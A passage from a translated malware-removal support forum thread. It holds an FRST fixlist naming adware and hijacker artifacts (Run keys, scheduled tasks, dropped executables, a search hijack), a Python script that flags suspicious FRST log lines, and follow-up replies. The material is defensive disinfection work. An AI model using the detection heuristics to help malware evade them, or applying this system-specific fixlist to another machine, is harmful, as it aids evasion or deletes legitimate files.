    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [avdrzeqtghj] => C:\Users\shenzai\AppData\Roaming\koqyvsaiayp\41rp2vfgvbd.exe [8192 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [6ATVXOA3HL03UZA] => C:\Program Files\MM5915986V\MM5915986.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [IJ0EJJZFO34LO56] => C:\Program Files\1R2KLZCDR0\1R2KLZCDR.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [J73XW9IBZ1E86E2] => C:\Program Files\G8P4KU1YKZ\G8P4KU1YK.exe [1040384 2017-06-20] ()
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [YeaDesktop] => C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe [3513856 2017-06-13] () <===== UWAGA
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Run: [msiql] => C:\Users\shenzai\AppData\Local\Temp\00009416\msiql.exe [2072576 2017-06-20] () <===== UWAGA
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: F - F:\Autorun.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: H - H:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: J - J:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {022c7a56-8870-11e5-85a6-bcaec582f204} - F:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {1c1b9931-1429-11e6-b560-bcaec582f204} - J:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {3d75d6bc-a5e7-11e6-b9b4-bcaec582f204} - I:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {40bf05a0-929f-11e5-a15b-bcaec582f204} - G:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {40eca389-0568-11e5-86c6-806e6f6e6963} - E:\SETUP.EXE
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {7370324e-b539-11e5-8408-bcaec582f204} - H:\setup.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {740b6ab8-2c4b-11e7-b47f-bcaec582f204} - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {d6a9f553-0635-11e5-9899-bcaec582f204} - F:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\MountPoints2: {eec25d75-fb41-11e6-bb3c-bcaec582f204} - G:\HiSuiteDownLoader.exe
    HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-06-02] (Microsoft Corporation)
    ShellExecuteHooks: Brak nazwy - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\ProgramData\igfxDH.dll [952832 2017-06-08] ()
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll -> Brak pliku
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2016-08-24]
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
    Startup: C:\Users\shenzai\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMVU.lnk [2016-08-24]
    ShortcutTarget: IMVU.lnk -> (Brak pliku)
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    Tcpip\..\Interfaces\{1E3853BB-0E67-481B-B902-F8BCB0DD6101}: [NameServer] 211.162.78.1,211.162.78.2
    URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll => Brak pliku
    BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
    FF user.js: detected! => C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\user.js [2017-04-08]
    FF NewTab: Mozilla\Firefox\Profiles\p8rrujta.default -> hxxp://www-searching.com/?pid=s&s=H6Jzamo...39dd65-472c-4daf-8167-4380a9c726b7,&fnt=1
    FF Extension: (Tables) - C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\Extensions\378507@extcorp.net.xpi [2017-04-08]
    FF Extension: (Fast search) - C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\Extensions\amcontextmenu@loucypher [2017-06-19]
    FF SearchPlugin: C:\Users\shenzai\AppData\Roaming\Mozilla\Firefox\Profiles\p8rrujta.default\searchplugins\smod.xml [2017-06-19]
    FF HKU\S-1-5-21-900294517-2085080873-4140816556-1001\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
    FF Extension: (McAfee Security Scan Plus) - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04] [Brak podpisu cyfrowego]
    CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=H6Jzltpbl1BU,352dd3f7-2197-492d-aa2f-2f009ff1c68e,
    CHR DefaultSearchKeyword: Default -> www-searching.com
    CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
    CHR Extension: (Tables) - C:\Users\shenzai\AppData\Local\Google\Chrome\User Data\Default\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2017-06-19]
    OPR Extension: (Tables) - C:\Users\shenzai\AppData\Roaming\Opera Software\Opera Stable\Extensions\egafjhhpbipcmpoiomegbckljbbbphoj [2017-06-19]
    OPR Extension: (Fast search) - C:\Users\shenzai\AppData\Roaming\Opera Software\Opera Stable\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-06-19]
    R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-03-07] () <==== UWAGA
    S2 JszipService; C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe [X]
    R1 cytdsk; C:\Windows\System32\drivers\cytdsk.sys [195496 2017-06-13] ()
    R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== UWAGA
    U0 aswVmm; Brak ImagePath
    S3 EverestDriver; \??\C:\Users\shenzai\AppData\Local\Temp\EverestDriver.sys [X] <==== UWAGA
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2017-06-20 20:14 - 2017-06-20 20:14 - 00000000 ____D C:\ProgramData\Microleaves
    2017-06-20 20:13 - 2017-06-20 20:13 - 01623552 _____ C:\ProgramData\service.exe
    2017-06-20 20:13 - 2017-06-20 20:13 - 00024228 _____ C:\Windows\System32\Tasks\{7A797A47-040C-0C05-0E11-7E0B0C7F117F}
    2017-06-20 20:13 - 2017-06-20 20:13 - 00003572 _____ C:\Windows\System32\Tasks\System Healer Task
    2017-06-20 20:13 - 2017-06-20 20:13 - 00003248 _____ C:\Windows\System32\Tasks\SystemHealer Monitor
    2017-06-20 20:13 - 2017-06-20 20:13 - 00001055 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\System Healer
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\ProgramData\d9fc8263-7fb7-0
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\ProgramData\d9fc8263-0ea7-1
    2017-06-20 20:13 - 2017-06-20 20:13 - 00000000 ____D C:\Program Files (x86)\SystemHealer
    2017-06-20 20:12 - 2017-06-20 20:24 - 00000342 _____ C:\Windows\Tasks\Online Application V2G3.job
    2017-06-20 20:12 - 2017-06-20 20:17 - 00000000 ____D C:\Program Files (x86)\YeaDesktop
    2017-06-20 20:12 - 2017-06-20 20:14 - 00000374 _____ C:\Windows\Tasks\Updater_Online_Application.job
    2017-06-20 20:12 - 2017-06-20 20:12 - 00003206 _____ C:\Windows\System32\Tasks\Updater_Online_Application
    2017-06-20 20:12 - 2017-06-20 20:12 - 00003170 _____ C:\Windows\System32\Tasks\Online Application V2G3
    2017-06-20 20:12 - 2017-06-20 20:12 - 00003170 _____ C:\Windows\System32\Tasks\Online Application V2G2
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\Users\shenzai\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\Users\Public\Documents\XMUpdate
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop
    2017-06-20 20:12 - 2017-06-20 20:12 - 00000000 ____D C:\Program Files (x86)\Microleaves
    2017-06-20 20:11 - 2017-06-20 20:24 - 00000342 _____ C:\Windows\Tasks\Online Application V2G2.job
    2017-06-20 20:11 - 2017-06-20 20:24 - 00000342 _____ C:\Windows\Tasks\Online Application V2G1.job
    2017-06-20 20:11 - 2017-06-20 20:11 - 00016684 _____ C:\Windows\System32\Tasks\MyReader
    2017-06-20 20:11 - 2017-06-20 20:11 - 00003170 _____ C:\Windows\System32\Tasks\Online Application V2G1
    2017-06-20 20:11 - 2017-06-20 20:11 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\Microleaves
    2017-06-20 20:11 - 2017-06-20 20:11 - 00000000 ____D C:\Users\shenzai\AppData\Local\jiobodfkmdffkcajblpbomgodflafoph
    2017-06-20 20:11 - 2017-06-20 20:11 - 00000000 ____D C:\Users\shenzai\AppData\Local\AdvinstAnalytics
    2017-06-20 20:11 - 2017-06-08 16:08 - 00952832 ___SH C:\ProgramData\igfxDH.dll
    2017-06-20 20:10 - 2017-06-20 20:11 - 00000000 ____D C:\Program Files\G8P4KU1YKZ
    2017-06-20 20:10 - 2017-06-20 20:11 - 00000000 ____D C:\Program Files\1R2KLZCDR0
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\y5biuysevnl
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\toczbv142yx
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\koqyvsaiayp
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ghiuy3lhhxs
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\dybmia1ijuv
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Program Files\W5M8VVC41Z
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Program Files\MM5915986V
    2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Program Files\4PBTGJC09T
    2017-06-20 16:17 - 2017-06-20 16:17 - 00285696 ____H C:\Windows\system32\BIT5FB1.tmp
    2017-06-20 16:17 - 2017-06-20 16:17 - 00285696 ____H C:\Windows\system32\BIT45E9.tmp
    2017-06-19 22:01 - 2017-06-20 20:15 - 00002562 _____ C:\Windows\System32\Tasks\UCBrowserUpdaterCore
    2017-06-19 22:01 - 2017-06-20 20:15 - 00000294 _____ C:\Windows\Tasks\UCBrowserUpdaterCore.job
    2017-06-19 22:00 - 2017-06-20 20:12 - 00003476 _____ C:\Windows\System32\Tasks\UCBrowserSecureUpdater
    2017-06-19 21:35 - 2017-06-20 20:12 - 00000979 _____ C:\Users\Public\Desktop\magicdisk.lnk
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\s3hgbczwrde
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\c0hqm2ldlwn
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Program Files\TKW87PQMG6
    2017-06-19 21:34 - 2017-06-19 21:34 - 00000000 ____D C:\Program Files\MUMESLMP8Z
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\yry2vavm0el
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\rqva4vu3i5j
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Program Files\UG6R5GFKJM
    2017-06-19 21:33 - 2017-06-19 21:33 - 00000000 ____D C:\Program Files\BOBQXDCZQA
    2017-06-19 21:22 - 2017-06-19 21:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\hrjq31jjr1s
    2017-06-19 21:22 - 2017-06-19 21:22 - 00000000 ____D C:\Program Files\5XR5VD3DZ9
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\qpmxs3bw3ng
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\qkbq50xf10b
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\dz5uts4wvfd
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Program Files\393WNXK8JD
    2017-06-19 21:21 - 2017-06-19 21:21 - 00000000 ____D C:\Program Files\1RBOSEKT1M
    2017-06-19 21:10 - 2017-06-19 21:55 - 00000000 ____D C:\AdwCleaner
    2017-06-19 21:07 - 2017-06-19 21:42 - 00002812 _____ C:\Users\shenzai\Desktop\Rkill.txt
    2017-06-19 21:07 - 2017-06-19 21:07 - 01106888 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill64-32766.exe
    2017-06-19 21:07 - 2017-06-19 21:07 - 01106888 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill64.exe
    2017-06-19 21:07 - 2016-04-06 22:57 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill.exe
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\sugqxgvlxy5
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\q05qybgj5jq
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Program Files\ISQS1Z69P0
    2017-06-19 21:05 - 2017-06-19 21:05 - 00000000 ____D C:\Program Files\93I1LBPZ1T
    2017-06-19 21:04 - 2017-06-19 21:04 - 00912452 _____ C:\Users\shenzai\Downloads\rkill (2).zip
    2017-06-19 21:04 - 2017-06-19 21:04 - 00912452 _____ C:\Users\shenzai\Downloads\rkill (1).zip
    2017-06-19 21:03 - 2017-06-19 21:04 - 00912452 _____ C:\Users\shenzai\Downloads\rkill.zip
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\zmzrs3tx0wf
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\nura0dmmhpv
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ldmagzil55c
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\fhzrd0gttza
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Program Files\XC5Z0BU2Y6
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Program Files\WRTZITNY23
    2017-06-19 20:34 - 2017-06-19 20:34 - 00000000 ____D C:\Program Files\SR251QB9FR
    2017-06-19 20:30 - 2017-06-19 20:54 - 00003162 _____ C:\Windows\System32\Tasks\0b5c76bb7599252601fe688dbc063f23
    2017-06-19 20:23 - 2017-06-20 20:27 - 00016708 _____ C:\Windows\System32\Tasks\Kaypall Phone
    2017-06-19 20:15 - 2017-06-19 20:15 - 00000000 ____D C:\Program Files\BLWC39Q0E4
    2017-06-19 20:14 - 2017-06-19 20:14 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\qeqzfuxunch
    2017-06-19 20:14 - 2017-06-19 20:14 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\e43xx11teho
    2017-06-19 20:14 - 2017-06-19 20:14 - 00000000 ____D C:\Program Files\R8BW7C91AT
    2017-06-19 20:13 - 2017-06-19 20:13 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\fycv4iesk2e
    2017-06-19 20:13 - 2017-06-19 20:13 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\1s2rv3j1a2i
    2017-06-19 20:13 - 2017-06-19 20:13 - 00000000 ____D C:\Program Files\JBLV5TJ2Z1
    2017-06-19 19:33 - 2017-06-19 19:33 - 00000000 ____D C:\Program Files\V3HHTTJHKZ
    2017-06-19 19:33 - 2017-06-19 19:33 - 00000000 ____D C:\Program Files\4W8VSVFL0W
    2017-06-19 19:32 - 2017-06-19 19:32 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\tepzay5bj1y
    2017-06-19 19:32 - 2017-06-19 19:32 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\k2gnjykm5ii
    2017-06-19 19:31 - 2017-06-19 19:31 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\matll4qacsu
    2017-06-19 19:31 - 2017-06-19 19:31 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ldcqlyuiywt
    2017-06-19 19:31 - 2017-06-19 19:31 - 00000000 ____D C:\Program Files\J7OD4XH1PR
    2017-06-19 19:24 - 2017-06-19 19:24 - 07307264 _____ C:\Users\shenzai\AppData\Local\agent.dat
    2017-06-19 19:24 - 2017-06-19 19:24 - 01896509 _____ C:\Users\shenzai\AppData\Local\Silmattom.tst
    2017-06-19 19:24 - 2017-06-19 19:24 - 00126464 _____ C:\Users\shenzai\AppData\Local\noah.dat
    2017-06-19 19:24 - 2017-06-19 19:24 - 00070800 _____ C:\Users\shenzai\AppData\Local\Config.xml
    2017-06-19 19:24 - 2017-06-19 19:24 - 00018432 _____ C:\Users\shenzai\AppData\Local\Main.dat
    2017-06-19 19:24 - 2017-06-19 19:24 - 00005568 _____ C:\Users\shenzai\AppData\Local\md.xml
    2017-06-19 19:24 - 2017-06-19 19:24 - 00000000 ____D C:\Users\shenzai\AppData\Local\UCBrowser
    2017-06-19 19:24 - 2017-06-19 19:22 - 02465280 _____ (TODO: <Company name>) C:\Users\shenzai\AppData\Local\Silmattom.exe
    2017-06-19 19:23 - 2017-06-19 19:24 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-06-19 19:23 - 2017-06-19 19:23 - 00278509 _____ C:\Users\shenzai\AppData\Local\Medron.bin
    2017-06-19 19:22 - 2017-06-19 20:55 - 00000000 ____D C:\Program Files (x86)\BZip
    2017-06-19 19:22 - 2017-06-19 19:35 - 01705984 _____ C:\Users\shenzai\AppData\Local\po.db
    2017-06-19 19:22 - 2017-06-19 19:27 - 00000000 ____D C:\Program Files (x86)\Retreive
    2017-06-19 19:22 - 2017-06-19 19:22 - 00930816 _____ C:\Users\shenzai\AppData\Local\test_db_cara.db
    2017-06-19 19:22 - 2017-06-19 19:22 - 00140800 _____ C:\Users\shenzai\AppData\Local\installer.dat
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ub1iemx3kwf
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\kvkbvqhhk1u
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\fmbsrdwt5cy
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\4nnus0vhemn
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\UYIF6DU5IU
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\O825X73I2W
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\9CNCLV5VH3
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\7VF1CV9KEO
    2017-06-19 19:22 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\2CDSOXRAHX
    2017-06-19 19:21 - 2017-06-20 20:12 - 00000000 ____D C:\Program Files (x86)\mgdisk
    2017-06-19 19:21 - 2017-06-19 20:14 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\IeMiss2
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\irqehcq4yo1
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files\MG7Q0GZCFX
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files (x86)\bcztbxttabt
    2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files (x86)\af5eu2vwtg0
    2017-06-19 19:21 - 2017-06-19 19:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\ytiwsjabqud
    2017-06-19 19:21 - 2017-06-19 19:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk
    2017-06-19 19:20 - 2017-06-19 19:21 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\55manmergvu
    2017-06-19 19:20 - 2017-06-19 19:21 - 00000000 ____D C:\Program Files\H07RWKZIGX
    2017-06-19 19:20 - 2017-06-19 19:20 - 00117760 _____ C:\Windows\Manager.exe
    2017-06-17 06:23 - 2017-06-17 06:23 - 01126912 _____ C:\Windows\0bdbacc6a094c8dfe3ab91092151c1c4.exe
    2017-06-17 06:23 - 2017-06-17 06:23 - 00051630 _____ C:\Windows\uninstaller.dat
    2017-06-13 04:26 - 2017-06-13 04:26 - 00195496 _____ C:\Windows\system32\Drivers\cytdsk.sys
    2016-07-20 18:57 - 2016-07-20 18:57 - 0000016 _____ () C:\ProgramData\mntemp
    2017-06-20 20:13 - 2017-06-20 20:13 - 1623552 _____ () C:\ProgramData\service.exe
    C:\ProgramData\igfxDH.dll
    C:\ProgramData\service.exe
    EmptyTemp:

In FRST, select Fix.

If you run into problems, run FRST from WinRE:
https://www.fixitpc.pl/topic/4414-diagnostyka-infekcji-na-niestartujących-windows/

Once that is done, post new FRST logs from a fresh scan.

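The fixlist above is long because the installer dropped dozens of directories with randomly generated names (ten upper-case alphanumerics under Program Files, eleven lower-case ones under AppData\Roaming), loose executables directly in C:\ProgramData and C:\Windows, a hidden/system DLL, and a scheduled task whose only name is a GUID. As an added example that is not part of the thread and not code from the FRST project, the script below parses FRST-style file listing lines and flags those shapes so a helper can triage a new log quickly. The sample lines are constructed for the example (the paths are taken from this thread, the lines are not a verbatim excerpt) and the heuristics are derived only from what this log shows; a hit is a reason to look closer, not a verdict.

```python
import re

# Constructed sample input: FRST-style "files created" lines of the kind shown in the
# fixlist above. Paths come from the thread; the lines are assembled here for the example.
SAMPLE_LINES = [
    r"2017-06-20 20:13 - 2017-06-20 20:13 - 01623552 _____ C:\ProgramData\service.exe",
    r"2017-06-20 20:11 - 2017-06-08 16:08 - 00952832 ___SH C:\ProgramData\igfxDH.dll",
    r"2017-06-20 20:10 - 2017-06-20 20:11 - 00000000 ____D C:\Program Files\G8P4KU1YKZ",
    r"2017-06-20 20:10 - 2017-06-20 20:10 - 00000000 ____D C:\Users\shenzai\AppData\Roaming\y5biuysevnl",
    r"2017-06-19 19:21 - 2017-06-19 19:22 - 00000000 ____D C:\Program Files (x86)\bcztbxttabt",
    r"2017-06-19 19:24 - 2017-06-19 19:22 - 02465280 _____ (TODO: <Company name>) C:\Users\shenzai\AppData\Local\Silmattom.exe",
    r"2017-06-19 21:07 - 2016-04-06 22:57 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\shenzai\Downloads\rkill.exe",
    r"2017-06-19 19:20 - 2017-06-19 19:20 - 00117760 _____ C:\Windows\Manager.exe",
    r"2017-06-20 20:13 - 2017-06-20 20:13 - 00024228 _____ C:\Windows\System32\Tasks\{7A797A47-040C-0C05-0E11-7E0B0C7F117F}",
    r"2017-06-19 21:10 - 2017-06-19 21:55 - 00000000 ____D C:\AdwCleaner",
]

# One FRST listing line: created - modified - size attrs [(company)] path
LINE_RE = re.compile(
    r"^(?P<created>\d{4}-\d\d-\d\d \d\d:\d\d) - "
    r"(?P<modified>\d{4}-\d\d-\d\d \d\d:\d\d) - "
    r"(?P<size>\d+) (?P<attrs>[_A-Z]{5}) "
    r"(?:\((?P<company>[^)]*)\) )?"
    r"(?P<path>[A-Za-z]:\\.*)$"
)

# Name shapes observed in this thread's log (heuristic, assumed from the fixlist above):
# ten upper-case alphanumerics under Program Files, eleven lower-case alphanumerics
# under AppData\Roaming or Program Files (x86).
RANDOM_UPPER = re.compile(r"^[A-Z0-9]{10}$")
RANDOM_LOWER = re.compile(r"^[a-z0-9]{11}$")
GUID_NAME = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
# Directories where a freshly created executable is unusual for a normal install.
DROP_DIRS = {r"c:\programdata", r"c:\windows", r"c:\users\public\documents"}
# No version info, or the Visual Studio template placeholder left in place.
PLACEHOLDER_PUBLISHERS = {None, "", "TODO: <Company name>"}


def parse_line(line):
    """Parse one FRST file listing line into a dict, or return None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["size"] = int(rec["size"])
    rec["is_dir"] = "D" in rec["attrs"]
    rec["hidden"] = "H" in rec["attrs"]
    rec["system"] = "S" in rec["attrs"]
    return rec


def suspicion_reasons(rec):
    """Return the heuristic reasons a parsed record deserves a second look (may be empty)."""
    parent, _, name = rec["path"].rpartition("\\")
    parent_l = parent.lower()
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    reasons = []
    if rec["is_dir"]:
        if parent_l in (r"c:\program files", r"c:\program files (x86)") and (
            RANDOM_UPPER.match(name) or RANDOM_LOWER.match(name)
        ):
            reasons.append("random-looking directory name under Program Files")
        if parent_l.endswith(r"\appdata\roaming") and RANDOM_LOWER.match(name):
            reasons.append("random-looking directory name under AppData\\Roaming")
    else:
        if ext in ("exe", "dll", "sys") and parent_l in DROP_DIRS:
            reasons.append(f"executable created directly in {parent}")
        if ext in ("exe", "dll") and rec["company"] in PLACEHOLDER_PUBLISHERS:
            reasons.append("no publisher or placeholder publisher in version info")
        if rec["hidden"] or rec["system"]:
            reasons.append(f"hidden/system attributes on a new file ({rec['attrs']})")
        if parent_l.endswith(r"\system32\tasks") and GUID_NAME.match(name):
            reasons.append("scheduled task whose only name is a GUID")
    return reasons


def triage(lines):
    """Map each flagged path to its reasons; clean and unparsable lines are skipped."""
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = suspicion_reasons(rec)
        if reasons:
            flagged[rec["path"]] = reasons
    return flagged


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_LINES).items():
        print(path)
        for reason in reasons:
            print("   -", reason)
```

On the sample, rkill.exe (signed publisher, in Downloads) and the AdwCleaner folder pass clean, while the eight lines that mirror the fixlist entries are flagged with one to three reasons each; the loose DLL in C:\ProgramData collects all three (drop location, no publisher, hidden+system attributes). Paste the "files created" section of a real FRST.txt into `SAMPLE_LINES` to run it over a whole log.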
• #3 20 Jun 2017 22:46
    nataszka663
    Level 2

    I uninstalled the programs you mentioned. After running the fix they did not reappear, but unfortunately the virus still has not been removed. Here is the RTS made after the fix. (This time the computer asks for permission to open the virus as administrator, but even when I answer "no" it opens anyway, though not as insistently as before.) Should I run ADVCleaner and send that report as well?

EDIT
    Just in case, I am attaching the report as well.

    Merged. RADU23

• Helpful post
    #4 21 Jun 2017 07:50
    Kolobos
    Computer specialist

    Run the Fixlist given earlier from WinRE, then run it once more from normal mode in Windows; afterwards post new FRST logs from a scan together with the Fixlog.

    In Addition I still see AVG TuneUp, which was supposed to be uninstalled.

• #6 22 Jun 2017 15:14
    Kolobos
    Computer specialist

    You posted the old log again: Uruchmiony przez shenzai (administrator) NATUCHNA (20-06-2017 21:46:17)

    Post new logs, together with a new Addition.
